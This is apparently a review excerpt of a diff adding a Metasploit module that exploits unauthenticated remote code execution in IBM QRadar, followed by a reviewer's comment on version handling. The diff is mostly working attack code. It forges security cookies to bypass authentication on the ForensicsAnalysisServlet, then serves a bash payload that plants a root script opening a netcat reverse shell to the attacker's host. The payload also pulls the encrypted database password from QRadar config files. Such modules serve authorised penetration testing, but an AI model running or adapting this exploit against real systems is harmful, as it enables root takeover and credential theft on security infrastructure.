modules/exploits/linux/http/ibm_qradar_unauth_rce.rb

```diff
@@ -0,0 +1,226 @@
+    print_good("#{peer} - Sit back and relax, Shelly will come visit soon!")
+    send_response(cli, @payload)
+  end
+
+
+  # step 1 of the exploit, bypass authentication in the ForensicAnalysisServlet
+  def set_cookies
+    @sec_cookie = SecureRandom.uuid
+    @csrf_cookie = SecureRandom.uuid
+
+    post_data = "#{rand_text_alpha(5..12)},#{rand_text_alpha(5..12)}," +
+      "#{@sec_cookie},#{@csrf_cookie}"
+
+    res = send_request_cgi({
+      'uri'       => '/ForensicsAnalysisServlet/',
+      'method'    => 'POST',
+      'ctype'     => 'application/json',
+      'cookie'    => "SEC=#{@sec_cookie}; QRadarCSRF=#{@csrf_cookie};",
+      'vars_get'  =>
+      {
+        'action'  => 'setSecurityTokens',
+        'forensicsManagedHostIps' => "#{rand(256)}.#{rand(256)}.#{rand(256)}.#{rand(256)}"
+      },
+      'data'      => post_data
+    })
+
+    if res.nil? or res.code != 200
+      fail_with(Failure::Unknown, "#{peer} - Failed to set the SEC and QRadar CSRF cookies")
+    end
+  end
+
+  def exploit
+    print_status("#{peer} - Attempting to exploit #{target.name}")
+
+    # run step 1
+    set_cookies
+
+    # let's prepare step 2 (payload) and 3 (payload exec as root)
+    @payload_name = rand_text_alpha_lower(3..5)
+    root_payload = rand_text_alpha_lower(3..5)
+
+    if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
+      srv_host = Rex::Socket.source_address(rhost)
+    else
+      srv_host = datastore['SRVHOST']
+    end
+
+    http_service = (datastore['SSL'] ? 'https://' : 'http://') + srv_host + ':' + datastore['SRVPORT'].to_s
+    service_uri = http_service + '/' + @payload_name
+
+    print_status("#{peer} - Starting up our web service on #{http_service} ...")
+    start_service({'Uri' => {
+      'Proc' => Proc.new { |cli, req|
+        on_request_uri(cli, req)
+      },
+      'Path' => "/#{@payload_name}"
+    }})
+
+    @payload = %{#!/bin/bash
+
+# our payload that's going to be downloaded from our web server
+cat <<EOF > /store/configservices/staging/updates/#{root_payload}
+#!/bin/bash
+/usr/bin/nc -e /bin/sh #{datastore['LHOST']} #{datastore['LPORT']} &
+EOF
+
+### below is adapted from /opt/qradar/support/changePasswd.sh
+[ -z $NVA_CONF ] && NVA_CONF="/opt/qradar/conf/nva.conf"
+NVACONF=`grep "^NVACONF=" $NVA_CONF 2> /dev/null | cut -d= -f2`
+FRAMEWORKS_PROPERTIES_FILE="frameworks.properties"
+FORENSICS_USER_FILE="config_user.xml"
+FORENSICS_USER_FILE_CONFIG="$NVACONF/$FORENSICS_USER_FILE"
+
+# get the encrypted db password from the config
+PASSWORDENCRYPTED=`cat $FORENSICS_USER_FILE_CONFIG | grep WEBUSER_DB_PASSWORD | grep -o -P '(?<=>)([\\w\\=\\+\\/]*)(?=<)'`
+
+QVERSION=$(/opt/qradar/bin/myver | awk -F. '{print $1$2$3}')
+
+AU_CRYPT=/opt/qradar/lib/Q1/auCrypto.pm
+P_ENC=$(grep I_P_ENC ${AU_CRYPT} | cut -d= -f2-)
+P_DEC=$(grep I_P_DEC ${AU_CRYPT} | cut -d= -f2-)
+
+#if 7.2.8 or greater, use new method for hashing and salting passwords
+if [ $QVERSION -gt 727 ]
```

Comment:
Another "if" should be added here. I'm on 7.3 and I don't have "aes.key=" on frameworks file. If that's empty, decrypting option for "727" should be used.